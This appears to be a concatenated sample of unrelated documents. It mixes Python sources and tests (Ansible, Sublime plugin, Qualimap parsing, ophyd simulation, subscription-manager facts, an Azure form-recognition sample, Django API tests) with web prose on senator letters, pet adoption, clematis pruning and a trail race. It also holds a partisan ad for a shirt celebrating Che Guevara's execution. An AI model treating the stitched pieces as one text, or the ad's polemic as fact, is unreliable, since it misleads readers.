'exists': self._api.tm.ltm.profile.mssqls.mssql.exists
}
def main():
params = ModuleParams()
module = AnsibleModule(argument_spec=params.argument_spec, supports_check_mode=params.supports_check_mode)
try:
obj = F5BigIpLtmProfileMssql(check_mode=module.check_mode, **module.params)
result = obj.flush()
module.exit_json(**result)
except Exception as exc:
module.fail_json(msg=str(exc))
if __name__ == '__main__':
main()
|
Write to your senator to bring attention to your issue of choice.
One of the best ways to get the attention of your senator, be it of the state or federal variety, is to write a professional letter. All government officials take this kind of correspondence seriously as it represents a voter's interests. If congressmen do not listen to and respond appropriately to voters' concerns, they are less likely to receive the electoral support needed for re-election. There are three keys to writing a letter to a senator. Keep it focused. Keep it professional. Give your senator an action item.
Starting in the upper left-hand corner list your name and contact information. Under this put the date followed by the senator's address. Then write a brief salutation and begin the text of your letter. Finally, write a closing and sign your name at the bottom.
Introduce yourself and your credentials, if these are appropriate to the issue. State precisely why you are writing to your senator. Keep it factual, not emotional. Provide as much specific information as possible detailing how your issue affects both you and others. If a particular bill is involved, be sure to list it by name and number.
Present your senator with an action item. Having something concrete that you are looking for will help focus his attention and better the chances of your letter getting the appropriate reply. Ask your senator for a specific response. Thank him for taking the time to read your letter and ask that he either consider voting a certain way or ask that his office get back to you with a particular piece of information.
Bradley, Steve. "How to Write a Sample Letter to a Senator." Synonym, https://classroom.synonym.com/how-to-write-a-sample-letter-to-a-senator-12083944.html. 29 September 2017.
|
# -*- coding: utf8 -*-
# Copyright (C) 2013 - Oscar Campos <oscar.campos@member.fsf.org>
# This program is Free Software see LICENSE file for details
"""
Anaconda decorators
"""
import os
import sys
import time
import pstats
import logging
import functools
try:
import cProfile
CPROFILE_AVAILABLE = True
except ImportError:
CPROFILE_AVAILABLE = False
try:
import sublime
from .helpers import get_settings, project_name
except ImportError:
# we just imported the file from jsonserver so we don't need get_settings
pass
def auto_project_switch(func):
"""Auto kill and start a new jsonserver on project switching
"""
@functools.wraps(func)
def wrapper(self, *args, **kwargs):
if not self.green_light:
return
view = sublime.active_window().active_view()
auto_project_switch = get_settings(view, 'auto_project_switch', False)
python_interpreter = get_settings(view, 'python_interpreter')
# expand ~/ in the python_interpreter path
python_interpreter = os.path.expanduser(python_interpreter)
# expand $shell vars in the python_interpreter path
python_interpreter = os.path.expandvars(python_interpreter)
if (
auto_project_switch and hasattr(self, 'project_name') and (
project_name() != self.project_name
or self.process.args[0] != python_interpreter)
):
            print('Project or interpreter switch detected...')
self.process.kill()
self.reconnecting = True
self.start()
else:
func(self, *args, **kwargs)
return wrapper
def timeit(logger):
"""Decorator for timeit timeit timeit
"""
def decorator(func):
@functools.wraps(func)
def wrapper(*args, **kwargs):
starttime = time.time()
result = func(*args, **kwargs)
endtime = time.time()
total = endtime - starttime
logger.debug(
'Func {} took {} secs'.format(func.__name__, total)
)
return result
return wrapper
return decorator
def profile(func):
"""Run the profiler in the given function
"""
@functools.wraps(func)
def wrapper(*args, **kwargs):
view = sublime.active_window().active_view()
if get_settings(view, 'anaconda_debug', False) == 'profiler':
if CPROFILE_AVAILABLE:
pr = cProfile.Profile()
pr.enable()
result = func(*args, **kwargs)
pr.disable()
ps = pstats.Stats(pr, stream=sys.stdout)
ps.sort_stats('time')
ps.print_stats(15)
else:
                logging.error(
                    'cProfile does not seem to be importable on ST3 + {}; '
                    'you may want to use @timeit instead.'.format(sys.platform)
                )
result = func(*args, **kwargs)
else:
result = func(*args, **kwargs)
return result
return wrapper
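A minimal usage sketch of the `timeit` decorator above, runnable outside Sublime Text (the decorator is restated so no `sublime` import is needed):

```python
import functools
import logging
import time

logging.basicConfig(level=logging.DEBUG)
log = logging.getLogger('timeit-demo')

def timeit(logger):
    """Same shape as the decorator above: log how long each call takes."""
    def decorator(func):
        @functools.wraps(func)
        def wrapper(*args, **kwargs):
            starttime = time.time()
            result = func(*args, **kwargs)
            logger.debug(
                'Func {} took {} secs'.format(func.__name__, time.time() - starttime)
            )
            return result
        return wrapper
    return decorator

@timeit(log)
def slow_add(a, b):
    time.sleep(0.01)
    return a + b

print(slow_add(2, 3))     # → 5 (plus a DEBUG line with the timing)
print(slow_add.__name__)  # → slow_add (functools.wraps preserved the name)
```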
|
Remember, all of these organizations have pets available for adoption.
While adopting a pet is a fun idea for the holidays, don't jump in too quickly. Adopting a dog or a cat is a lifetime commitment, for the lifetime of the animal. A living animal is not a "Christmas present" that one person should give another as a surprise. Adopting a pet is a great thing to do at any time of year, but the eventual end caregiver should be the person choosing the animal, and should do it not only in the spirit of the season, but because they've wanted to do it anyway, regardless of the holiday buzz.
There are plenty of wonderful, loving pets available for adoption in the Worcester area, and throughout Massachusetts and New England. Shop around, and make sure the animal is a good fit for the family adopting. Humans should always have equal or higher energy than a dog, for instance. An active family who likes running, bike riding, hiking, and day trips that include lots of physical activity would do great with a Border Collie, but an English Bulldog might have trouble keeping up. Conversely, the folks who want to watch football on TV, and not actually play the sport, might fare better adopting a senior pet, a cat (or two!) or that English Bulldog who can't keep up with aforementioned active family.
Not ready to make that 15-year commitment? (because that's what it is!) Shelters and rescues are always looking for foster homes. It's a great way to have a pet, help out a shelter or rescue, and get to know how an animal would fit into a home and lifestyle. Many times foster families "fail", which is a good thing (a foster-fail means the foster family ends up keeping the pet).
There are a lot of senior pets looking for homes, which is a great way to make a shorter commitment, and help a pet in need (and a shelter or rescue in need). Senior pets are almost always more uncomfortable in a shelter setting than their younger counterparts in neighboring crates. Senior dogs or cats make wonderful companions, and are almost always fully-trained. They may have special medical needs, but the rewards outweigh the negatives.
If interest lies with a puppy or kitten, be prepared for months of house-training and other training, as well as chewing, digging, scratching, knocking things over, staining and soiling! That's not to say that having a puppy or kitten from the beginning isn't a wise choice (think how great they will be when they're a senior!), but "know what you're getting into" is a good thing to keep in mind.
The majority of pets surrendered to shelters are between one and three years of age -- experienced pet parents can adopt one of these energetic dogs and cats, who are often surrendered for no other reason than the original adopters' ignorance of the extent of the commitment required when raising a young cat or dog.
Check out the various adoption specials offered by the shelters and rescues listed in this article, or go to petfinder.com for more.
Still not ready to welcome a pet into your own home? Check out the great holiday shopping offers from Second Chance Animal Shelter, and Worcester Animal Rescue League and the Santa photo ops from Broken Tail and Great Dog Rescue. Some offers are listed on the group's Facebook pages, and not on their web sites. From clickable discounts online, to store discounts at various local stores who donate part of purchases to one of the shelters, to special holiday ornaments, decorations, 2013 calendars and gifts with shelter or rescue logos, the possibilities are endless to give back while doing your holiday shopping. Or, take the easiest way out and make a simple donation to any local shelter. No amount is too big, or too small. It's all in the holiday spirit.
|
from targqc.utilz.logger import warn
metric_names = [
'Reference size',
'Regions size/percentage of reference (on target)',
'Regions size/percentage of reference (on target) %',
'Coverage Mean',
'Coverage Mean (on target)',
'Coverage Standard Deviation',
'Coverage Standard Deviation (on target)',
'Number of reads',
'Mapped reads',
'Mapped reads %',
'Unmapped reads',
'Unmapped reads %',
'Mapped reads (on target)',
'Mapped reads (on target) %',
'Mapped paired reads',
'Mapped paired reads %',
'Paired reads',
'Paired reads %',
'Duplicated reads (flagged)',
'Duplicated reads (flagged) %',
'Duplicated reads (flagged) (on target)',
'Duplicated reads (flagged) (on target) %',
'Read min length',
'Read max length',
'Read mean length',
'Mean Mapping Quality (on target)',
'Mismatches (on target)',
'Insertions (on target)',
'Deletions (on target)',
'Homopolymer indels (on target)',
'Mean Mapping Quality',
'Mismatches',
'Insertions',
'Deletions',
'Homopolymer indels',
]
ALLOWED_UNITS = ['%']
def parse_qualimap_sample_report(report_fpath):
value_by_metric = dict()
def __get_td_tag_contents(line):
## examples:
# <td class=column1>Paired reads</td>
# <td class=column2>80,244 / 99.89%</td>
crop_left = line.split('>')
if len(crop_left) < 2:
return None
crop_right = crop_left[1].split('<')
return crop_right[0].strip()
def __fill_record(metric_name, line):
val = __get_td_tag_contents(line)
val = val.replace(' ', '').replace(',', '')
try:
val = val.replace(b'\xc2\xa0', '')
except:
val = val.replace(b'\xc2\xa0'.decode(), '')
if metric_name == 'Read min/max/mean length': # special case
for metric_infix, value in zip(['min', 'max', 'mean'], val.split('/')):
value_by_metric['Read ' + metric_infix + ' length'] = value
else:
if metric_name not in metric_names:
# warn('Qualimap metric "' + metric_name + '" is not in allowed metric_names')
return
num_chars = []
unit_chars = []
i = 0
while i < len(val) and (val[i].isdigit() or val[i] in ['.']):
num_chars += val[i]
i += 1
while i < len(val):
unit_chars += val[i]
i += 1
val_num = ''.join(num_chars)
val_unit = ''.join(unit_chars)
if val_unit and val_unit in ALLOWED_UNITS:
# metric.unit = val_unit
pass
try:
val = int(val_num)
if val_unit == '%':
val = float(val) / 100
except ValueError:
try:
val = float(val_num)
if val_unit == '%':
val /= 100
except ValueError: # it is a string
val = val_num + val_unit
value_by_metric[metric_name] = val
            if val_unit.startswith('/'):  # for values like "80,220 / 99.86%"
                meta_val = val_unit.replace('/', '').strip()
                if '%' in meta_val:
                    try:
                        val = float(meta_val.replace('%', '')) / 100.0
                    except ValueError:
                        pass
                value_by_metric[metric_name + ' %'] = val
sections = [['start', 'Summary'],
['globals (on target)', 'Globals (inside of regions)'],
['globals', 'Globals'],
['coverage (on target)', 'Coverage (inside of regions)'],
['coverage', 'Coverage'],
['mq (on target)', 'Mapping Quality (inside of regions)'],
['mq', 'Mapping Quality'],
['mismatches and indels (on target)', 'Mismatches and indels (inside of regions)'],
['mismatches and indels', 'Mismatches and indels'],
['finish', 'Coverage across reference']] # plots are starting from this line
on_target_stats_suffix = ' (on target)'
coverage_stats_prefix = 'Coverage '
with open(report_fpath) as f:
cur_section = None
cur_metric_name = None
for line in f:
if 'class=table-summary' in line:
cur_section = None
continue
if cur_section is None:
for name, pattern in sections:
if pattern in line:
cur_section = name
break
if cur_section is None:
continue
if cur_section == 'finish':
break
if line.find('class=column1') != -1:
cur_metric_name = __get_td_tag_contents(line)
if cur_section.endswith('(on target)'):
cur_metric_name += on_target_stats_suffix
if cur_section.startswith('coverage'):
cur_metric_name = coverage_stats_prefix + cur_metric_name
# if not metric_storage.get_metric(cur_metric_name): # special case for Duplication rate and Clipped reads (Qualimap v.1 and v.2 difference)
# if metric_storage.get_metric(cur_metric_name + on_target_stats_suffix): # extra 'on target' metrics
# cur_metric_name += on_target_stats_suffix
if cur_metric_name and line.find('class=column2') != -1:
__fill_record(cur_metric_name, line)
cur_metric_name = None
return value_by_metric
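The digit/unit split inside `__fill_record` can be exercised on its own; this hypothetical helper mirrors that scanning loop on a typical Qualimap cell value (after spaces and commas are stripped):

```python
def split_value(val):
    """Split a Qualimap cell like '80244/99.89%' into (number, unit) strings."""
    i = 0
    # consume the leading numeric part, same as the while loop in __fill_record
    while i < len(val) and (val[i].isdigit() or val[i] == '.'):
        i += 1
    return val[:i], val[i:]

# "80,244 / 99.89%" after stripping spaces and commas:
num, unit = split_value('80244/99.89%')
print(num)   # → 80244
print(unit)  # → /99.89%

# the trailing '/99.89%' part yields the companion '... %' metric:
meta = unit.replace('/', '').strip()
pct = float(meta.replace('%', '')) / 100.0
print(pct)   # ~0.9989
```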
|
If you’ve ever seen a clematis that is one big mountain of tangled up stems, it’s almost enough to scare you away from growing them. But let’s take a look at why, when, and how these remarkable vines should be pruned and you’ll find it’s not as difficult as it seems.
Properly pruning clematises will yield the maximum quantity of flowers by stimulating new growth. Pruning keeps the more vigorous vines under control. If not pruned, these large plants can literally tear down almost any support with their sheer weight. Keeping vines pruned brings flowers down to eye level rather than at a top of a tall plant. And if you have one of those mountains of tangled stems, pruning allows air and light to circulate through the leaves, reducing moisture that can cause diseases, and also tidies up the entire plant and displays the flowers to their best advantage. Clematises can live up to 50 years, so we want to take good care of them.
It’s obvious, therefore, that all clematises need to be pruned. Almost everyone knows that there are three main groups of clematis, with three different pruning techniques. Don’t let this worry you because it’s not as difficult as it sounds.
Example of a top-heavy vine (Duchess of Albany, Group 3). Incidentally, the rabbits chew this one down to the ground every year!
Before we find out more about the three groups, there is something that every new clematis needs. Very early in the first spring after the year you plant them, all types of clematises need to be cut back to approximately 12 inches from the ground. I know, it’s really hard to do because everyone wants to see the flowers, but doing so will make the root system stronger and promote branching and new stems from underground, making the entire plant bushier and healthier. So that means that you’ll lose your flowers the first year on some clematises, but it also means that you’ll have many years of more flowers than ever. That sounds like a pretty good trade off to me! If you don’t do this, it won’t kill your vine, but you will be very disappointed when you end up with one or two wimpy vines with only a couple of flowers. Then you’ll probably end up cutting it back anyway and losing even more time in the process.
Let's take a look at the three pruning groups. Every clematis has a pruning group assigned to it. If you purchase from a reputable nursery, that information will be included on the tag or on the nursery's website. If it isn’t, you can find the pruning group for each cultivar right here in our ATP database. Once you know the pruning group, it’s just a matter of following the information for that group.
Group #1: These are the early-flowering and evergreen clematises, and the group also includes the alpina, cirrhosa, macropetala and montana species. They flower on “old wood,” which is growth from the previous year. Don’t go crazy pruning this group. Only a light pruning is needed. Any growth that occurs after pruning will be the stems that will produce buds for next year's flowers. If you want these vines to spread quickly, only prune to remove dead or damaged growth. To keep vigorous growth under control, you’ll want to prune back a bit more. Try to avoid pruning any woody growth.
Group #2: Included in this group are early and mid-season large-flowering, double and semi-double clematis. These plants can be a little tricky because they flower on both old and new wood. The biggest flush with the largest flowers is in spring on old wood, followed by a smaller flush in fall, or even by a steady, small amount of flowers throughout the summer. When pruning, follow the vine down to a swelling leaf axil bud and prune right above it.
Not a very good example, but if you look at the large vine right at the place where it's branching out, you can see the leaf axil buds just beginning to form.
Remove any dead wood, tidy the vine up a bit, and prune back to keep growth in check. If you have a big tangle of vines left from last year, try to untangle as many vines as you can after the first flush of flowers. If you can't untangle the vines, this is the time for a hard pruning, up to as much as 1/3 of each vine. If you do a hard pruning and your plant has double flowers, you may only get single flowers later this year. To keep a more natural look, stagger the length of the vines as you trim them back. Tie any new growth to supports to keep the plant open to air and sunlight. You’ll also want to remove any old leaf stalks remaining on the vines from last year. Plants in this group tend to get bare toward the bottom as they get older and do well with other plants around them, covering their bare stems. If they get too top heavy, they can be pruned back quite hard without damaging them. If you live in a very cold area, you’ll probably have to prune back farther due to damage by winter weather, or you may not have a choice at all if they die back to the ground.
Notice the flowers all the way to the ground on this beautifully pruned clematis.
Some suggest that Group 2 plants should be cut back hard every third year to avoid the tangled, old growth that can occur on the top of these plants.
If you’re feeling adventurous, you can also do a special “second-year pruning” on these clematises, and on Group 1 plants as well. This is another hard pruning, but this time it entails cutting back the vines to about three feet from the ground. Again, this causes more new stems to grow from the ground and stimulates the vines to branch out. This isn’t necessary, but it will improve the appearance and health of your clematis in subsequent years.
Group #3: Late large-flowering, late flowering species, and viticella clematises make up this group. They generally die back to the ground in winter in cold areas. If not, they respond well to hard pruning and can be cut back to about two feet tall. They usually get flowers on the last several feet of new growth and can be cut back even farther because they don’t bloom on old wood. Like the Group 2 vines, they will get bare stems toward the bottom as they age if they aren't cut back hard. Hard pruning sounds brutal, but it will reward you with lots of new growth and many flowers. As the new growth appears, tie it to supports to keep it looking its best. This is probably the easiest group to prune.
There are also clematises known as integrifolia or herbaceous clematises. These are non-vining perennials with a dense and somewhat sprawling habit. Although they can't attach themselves to a support, they can be tied to one or left to sprawl on the ground. These can be cut to the ground with your other perennials in late fall or early spring.
Another reason to prune is to control wilt. Clematis wilt occurs when the ends of the vine turn black and the vine, or even the entire plant, collapses. When this happens, cutting the plant all the way back to the ground will produce new growth. This is a radical pruning method but it will save your plant.
As you gain more experience with the clematises you have, you’ll be able to recognize the three pruning groups from their bloom time. Group 1 blooms in early spring, Group 2 blooms on old wood in the spring and new wood later in the year, and Group 3 blooms on new wood late in the year.
Now that you know how easy it is to prune them, your plants will be happier and prettier and will produce more flowers. Quite an impressive return on investment for only a few minutes a year!
|
# the two-theta motor and detector
# test xpd sim of motor movement
import numpy as np
from ophyd.sim import SynSignal, motor1, motor2
from lmfit import Model, Parameter, Parameters
from lmfit.models import VoigtModel, LinearModel
from lmfit.lineshapes import voigt
class SynGaussPeaks(SynSignal):
"""
Evaluate a point on a peaks based on the value of a motor.
Parameters
----------
name : string
motor : Device
motor_field : string
    centers : list of numbers
        centers of the peaks
Imax : number
max intensity of peak
sigma : number, optional
Default is 1.
noise : {'poisson', 'uniform', None}, optional
Add noise to the gaussian peak.
noise_multiplier : float, optional
Only relevant for 'uniform' noise. Multiply the random amount of
noise by 'noise_multiplier'
random_state : numpy random state object, optional
np.random.RandomState(0), to generate random number with given seed
Example
-------
    motor = SynAxis(name='motor')
    det = SynGaussPeaks('det', motor, 'motor', centers=[-1, 1], Imax=1, sigma=1)
"""
def __init__(self, name, motor, motor_field, centers, Imax, sigma=1,
noise=None, noise_multiplier=1, random_state=None, offset=None,
**kwargs):
if noise not in ('poisson', 'uniform', None):
raise ValueError("noise must be one of 'poisson', 'uniform', None")
self._motor = motor
if random_state is None:
random_state = np.random
def func():
m = motor.read()[motor_field]['value']
v = m*0
for center in centers:
v += Imax * np.exp(-(m - center) ** 2 / (2 * sigma ** 2))
if offset is not None:
v += offset
            if noise == 'poisson':
                # replace the value with a Poisson draw around it (adding it
                # on top would double the signal)
                v = int(random_state.poisson(np.round(v), 1))
elif noise == 'uniform':
v += random_state.uniform(-1, 1) * noise_multiplier
return v
super().__init__(func=func, name=name, **kwargs)
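The `func` closure above simply sums one Gaussian per entry of `centers`; a standalone sketch of that evaluation (plain numpy, no ophyd required — the `multi_gauss` name is illustrative, not part of the module):

```python
import numpy as np

def multi_gauss(m, centers, Imax=1.0, sigma=1.0, offset=None):
    # Sum one Gaussian per center, mirroring func() in SynGaussPeaks above.
    v = m * 0.0
    for center in centers:
        v += Imax * np.exp(-(m - center) ** 2 / (2 * sigma ** 2))
    if offset is not None:
        v += offset
    return v

# At a peak center the contribution is the full Imax.
print(multi_gauss(0.0, centers=[0.0], Imax=2.0))  # → 2.0
```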
D_SPACINGS = {'LaB6': np.array([4.15772, 2.94676, 2.40116]),
'Si': 5.43095 / np.array([np.sqrt(3), np.sqrt(8), np.sqrt(11), np.sqrt(27)]),
}
#def gaussian(theta, center, width):
# return 1500 / (np.sqrt(2*np.pi) * width) * np.exp(-((theta - center) / width)**2 / 2)
# for the simulation
SIMULATED_D = "Si"
def intensity(theta, amplitude, width, wavelength):
result = np.clip(5 * np.random.randn(), 0, None) # Gaussian noise
for d in D_SPACINGS['Si']:
assert wavelength < 2 * d, \
"wavelength would result in illegal arg to arcsin"
try:
center = np.arcsin(wavelength / (2 * d))
        except Exception:
            # should be unreachable given the assert above
            print("invalid Bragg angle for d =", d)
            center = 0
result += voigt(theta, amplitude, center, width)
result += voigt(-theta, amplitude, center, width)
return result
def current_intensity_peaks():
amplitude = 0.5
width = 0.004 # degrees
    wavelength = 12.398 / 66.4  # angstroms
two_theta = motor1.read()['motor1']['value'] # degrees
theta = np.deg2rad(two_theta / 2) # radians
return intensity(theta, amplitude, np.deg2rad(width), wavelength)
def current_intensity_dips():
amplitude = 0.5
width = 0.004 # degrees
    wavelength = 12.398 / 66.4  # angstroms
hw_theta = motor1.read()['motor1']['value'] # degrees
theta = np.deg2rad(hw_theta + 35.26) # radians
return -intensity(theta, amplitude, np.deg2rad(width), wavelength) + 10000
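Both detector functions above place their peaks via Bragg's law, theta = arcsin(lambda / 2d); a quick standalone check of the peak positions implied by the Si d-spacings defined earlier (values recomputed here so the snippet runs on its own):

```python
import numpy as np

wavelength = 12.398 / 66.4  # angstroms, same keV conversion as above
d_si = 5.43095 / np.array([np.sqrt(3), np.sqrt(8), np.sqrt(11)])  # angstroms

# Bragg's law: lambda = 2 * d * sin(theta)  =>  theta = arcsin(lambda / (2 * d))
theta = np.arcsin(wavelength / (2 * d_si))  # radians
two_theta = np.rad2deg(2 * theta)           # degrees, the axis the motor scans
print(np.round(two_theta, 2))
```

At this wavelength the first Si reflection lands near 3.4 degrees two-theta, which is why the simulated scans above cover only a few degrees around zero.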
th_cal = motor1
sc = SynSignal(name="det", func=current_intensity_dips)
''' test sim motors
import bluesky.plan_stubs as bps
import bluesky.plans as bp
from bluesky.callbacks import LivePlot
def myplan():
yield from bps.abs_set(motor1, 0)
    yield from bp.rel_scan([sc], motor1, -10, 10, 1000)
RE(myplan(), LivePlot('det', 'motor1'))
'''
|
Looking for a footing-friendly, low-key run through the woods? Have a go at Gail’s Trail Run in Huntington State Park, Redding, CT. This year approximately 130 runners took off on Sunday, December 11 at 8am for a 5.2 mile loop which included some challenging elevation changes and great scenery. The trail is mostly a two-track which provides for plenty of room throughout, making passing easy and providing good vision.
I especially liked the start/finish area. No major fanfare, blaring music or armies of volunteers. Instead, a very parochial atmosphere where you don’t even show your ID to get your number and (cool) hoodie. If you’re pre-registered, your name is there just as it should be. One porta-john, a table with a jug of Gatorade and a few gel packs. Simple. Right level of organization. Let’s just run this thing.
Some people run with their dogs. A handful of stud runners, but not there for PRs or qualifying times. Just give it your best and let the finishing times take care of themselves. At the start we meander up the trail until the starter says to stop and hold, then a short beep and we’re off. No overhead digital clock or balloon arch. We’re in the woods after all, respecting nature.
Runners are polite, respectful when passing or being passed, and no one crows about being in the top 10. On this 23-degree day the winner wears shorts and a tank top. The benefit is for pancreatic cancer research, and the event honors Gail Connor, who passed away from the disease.
Well done organizers, I’ll definitely be back next year. This was a really great event.
This entry was posted in Races and tagged connecticut, Race, Running, trail run. Bookmark the permalink.
Are you familiar with Leatherman’s Loop in NY? It’s a 10km in April/May and has some fun rivers, streams, etc.
Marisa: Yes, several of my friends have run that event. In fact, until two years ago the Gail’s Trail run was held there. I will do Leatherman’s one day, although with over 1,200 participants it is sounding quite crowded!
Great read Michael! So cool you and Kendall are doing this together. Looking forward to more posts from the two of you!
Thanks Jon. Kendall has dragged me into the blogging world, so now I’ve got to think of clever things to say on a regular basis. Guess I’d better keep running! Great to hear from you.
|
from __future__ import print_function, division, absolute_import
# Copyright (c) 2016 Red Hat, Inc.
#
# This software is licensed to you under the GNU General Public License,
# version 2 (GPLv2). There is NO WARRANTY for this software, express or
# implied, including the implied warranties of MERCHANTABILITY or FITNESS
# FOR A PARTICULAR PURPOSE. You should have received a copy of GPLv2
# along with this software; if not, see
# http://www.gnu.org/licenses/old-licenses/gpl-2.0.txt.
#
# Red Hat trademarks are not licensed under GPLv2. No permission is
# granted to use or replicate Red Hat trademarks that are incorporated
# in this software or its documentation.
#
import logging
from rhsmlib.facts import collector
log = logging.getLogger(__name__)
class CleanupCollector(collector.FactsCollector):
no_uuid_platforms = ['powervm_lx86', 'xen-dom0', 'ibm_systemz']
def get_all(self):
cleanup_facts = {}
dmi_socket_info = self.replace_socket_count_with_dmi()
cleanup_facts.update(dmi_socket_info)
return cleanup_facts
def explain_lack_of_virt_uuid(self):
# No virt.uuid equiv is available for guests on these hypervisors
#virt_is_guest = self._collected_hw_info['virt.is_guest']
if not self._is_a_virt_host_type_with_virt_uuids():
log.debug("we don't sell virt uuids here")
def _is_a_virt_host_type_with_virt_uuids(self):
virt_host_type = self._collected_hw_info['virt.host_type']
for no_uuid_platform in self.no_uuid_platforms:
if virt_host_type.find(no_uuid_platform) > -1:
return False
return True
def replace_socket_count_with_dmi(self):
cleanup_info = {}
# cpu topology reporting on xen dom0 machines is wrong. So
# if we are a xen dom0, and we found socket info in dmiinfo,
# replace our normal cpu socket calculation with the dmiinfo one
# we have to do it after the virt data and cpu data collection
if 'virt.host_type' not in self._collected_hw_info:
return cleanup_info
if not self._host_is_xen_dom0():
return cleanup_info
if 'dmi.meta.cpu_socket_count' not in self._collected_hw_info:
return cleanup_info
# Alright, lets munge up cpu socket info based on the dmi info.
socket_count = int(self._collected_hw_info['dmi.meta.cpu_socket_count'])
cleanup_info['cpu.cpu_socket(s)'] = socket_count
if 'cpu.cpu(s)' not in self._collected_hw_info:
return cleanup_info
# And the cores per socket count as well
dmi_cpu_cores_per_cpu = int(self._collected_hw_info['cpu.cpu(s)']) // socket_count
cleanup_info['cpu.core(s)_per_socket'] = dmi_cpu_cores_per_cpu
return cleanup_info
def _host_is_xen_dom0(self):
return self._collected_hw_info['virt.host_type'].find('dom0') > -1
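The guard chain in `replace_socket_count_with_dmi` only rewrites the facts when all three pieces of information are present; the same decision logic can be sketched against a plain dict (no rhsmlib imports — the function name and fact values here are illustrative):

```python
def dmi_socket_cleanup(hw_info):
    # Mirror of the guard chain above: only act for xen dom0 hosts
    # that actually reported a DMI socket count.
    cleanup = {}
    if 'virt.host_type' not in hw_info:
        return cleanup
    if 'dom0' not in hw_info['virt.host_type']:
        return cleanup
    if 'dmi.meta.cpu_socket_count' not in hw_info:
        return cleanup
    sockets = int(hw_info['dmi.meta.cpu_socket_count'])
    cleanup['cpu.cpu_socket(s)'] = sockets
    if 'cpu.cpu(s)' in hw_info:
        cleanup['cpu.core(s)_per_socket'] = int(hw_info['cpu.cpu(s)']) // sockets
    return cleanup

facts = {'virt.host_type': 'xen-dom0',
         'dmi.meta.cpu_socket_count': '2',
         'cpu.cpu(s)': '16'}
print(dmi_socket_cleanup(facts))
# → {'cpu.cpu_socket(s)': 2, 'cpu.core(s)_per_socket': 8}
```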
|
The 50th anniversary of Che Guevara's execution shirt. 50% Off!
What better way to celebrate than by wearing a commemorative "¡VIVA LA EJECUCIÓN!" t-shirt. Show how happy you are that he is dead by wearing this to the ballgame, church, grocery store, or school!
Be the first kid on your block with a Dead Che shirt!
The racist, mass-murdering, and homophobic Che was killed on 9 October 1967 by the 2nd Battalion Bolivian Rangers (unofficially known as the "Che Hunters"), who were trained and mentored by the 7th & 8th Special Forces Groups (SFG). On the left shoulder, you can see a commemorative patch from the Ranger unit that killed this thug.
Please Note: We currently only have Men's sizes, but we may be adding women's to the mix in the next run.
|
# coding: utf-8
# -------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
# --------------------------------------------------------------------------
"""
FILE: sample_recognize_identity_documents.py
DESCRIPTION:
This sample demonstrates how to recognize fields from an identity document.
See fields found on identity documents here:
https://aka.ms/formrecognizer/iddocumentfields
USAGE:
python sample_recognize_identity_documents.py
Set the environment variables with your own values before running the sample:
1) AZURE_FORM_RECOGNIZER_ENDPOINT - the endpoint to your Cognitive Services resource.
2) AZURE_FORM_RECOGNIZER_KEY - your Form Recognizer API key
"""
import os
class RecognizeIdDocumentsSample(object):
def recognize_identity_documents(self):
path_to_sample_forms = os.path.abspath(os.path.join(os.path.abspath(__file__),
"..", "./sample_forms/id_documents/license.jpg"))
# [START recognize_identity_documents]
from azure.core.credentials import AzureKeyCredential
from azure.ai.formrecognizer import FormRecognizerClient
endpoint = os.environ["AZURE_FORM_RECOGNIZER_ENDPOINT"]
key = os.environ["AZURE_FORM_RECOGNIZER_KEY"]
form_recognizer_client = FormRecognizerClient(
endpoint=endpoint, credential=AzureKeyCredential(key)
)
with open(path_to_sample_forms, "rb") as f:
poller = form_recognizer_client.begin_recognize_identity_documents(identity_document=f)
id_documents = poller.result()
for idx, id_document in enumerate(id_documents):
print("--------Recognizing ID document #{}--------".format(idx+1))
first_name = id_document.fields.get("FirstName")
if first_name:
print("First Name: {} has confidence: {}".format(first_name.value, first_name.confidence))
last_name = id_document.fields.get("LastName")
if last_name:
print("Last Name: {} has confidence: {}".format(last_name.value, last_name.confidence))
document_number = id_document.fields.get("DocumentNumber")
if document_number:
print("Document Number: {} has confidence: {}".format(document_number.value, document_number.confidence))
dob = id_document.fields.get("DateOfBirth")
if dob:
print("Date of Birth: {} has confidence: {}".format(dob.value, dob.confidence))
doe = id_document.fields.get("DateOfExpiration")
if doe:
print("Date of Expiration: {} has confidence: {}".format(doe.value, doe.confidence))
sex = id_document.fields.get("Sex")
if sex:
print("Sex: {} has confidence: {}".format(sex.value, sex.confidence))
address = id_document.fields.get("Address")
if address:
print("Address: {} has confidence: {}".format(address.value, address.confidence))
country_region = id_document.fields.get("CountryRegion")
if country_region:
print("Country/Region: {} has confidence: {}".format(country_region.value, country_region.confidence))
region = id_document.fields.get("Region")
if region:
print("Region: {} has confidence: {}".format(region.value, region.confidence))
# [END recognize_identity_documents]
if __name__ == '__main__':
sample = RecognizeIdDocumentsSample()
sample.recognize_identity_documents()
|
Designed specifically with the small team in mind, this coaching program enables small teams to double, triple or quadruple their production, market share and leverage. It is ideal for teams ranging from two people up to those that have not yet hired middle management. The Small Team Growth package supports the team leader with twice-monthly calls, as well as the entire team on several calls per week.
|
import datetime
import uuid
import mock
from django.utils import timezone
from django.core import mail
from rest_framework import status
from rest_framework.test import APITestCase
from cla_common.constants import CASE_SOURCE
from cla_eventlog.models import Log
from checker.serializers import CaseSerializer
from core.tests.mommy_utils import make_recipe
from core.tests.test_base import SimpleResourceAPIMixin
from legalaid.models import Case, PersonalDetails
from legalaid.tests.views.test_base import CLACheckerAuthBaseApiTestMixin
from call_centre.tests.test_utils import CallCentreFixedOperatingHours
class BaseCaseTestCase(
CLACheckerAuthBaseApiTestMixin, CallCentreFixedOperatingHours, SimpleResourceAPIMixin, APITestCase
):
LOOKUP_KEY = "reference"
API_URL_BASE_NAME = "case"
RESOURCE_RECIPE = "legalaid.case"
def make_resource(self):
return None
def assertCaseResponseKeys(self, response):
self.assertItemsEqual(
response.data.keys(),
[
"eligibility_check",
"personal_details",
"reference",
"requires_action_at",
"callback_window_type",
"adaptation_details",
"thirdparty_details",
],
)
def assertPersonalDetailsEqual(self, data, obj):
if data is None or obj is None:
self.assertEqual(data, obj)
else:
for prop in ["title", "full_name", "postcode", "street", "mobile_phone", "home_phone"]:
self.assertEqual(unicode(getattr(obj, prop)), data[prop])
def assertCaseEqual(self, data, case):
self.assertEqual(case.reference, data["reference"])
self.assertEqual(unicode(case.eligibility_check.reference), data["eligibility_check"])
self.assertPersonalDetailsEqual(data["personal_details"], case.personal_details)
self.assertEqual(Case.objects.count(), 1)
case = Case.objects.first()
self.assertEqual(case.source, CASE_SOURCE.WEB)
def get_personal_details_default_post_data(self):
return {
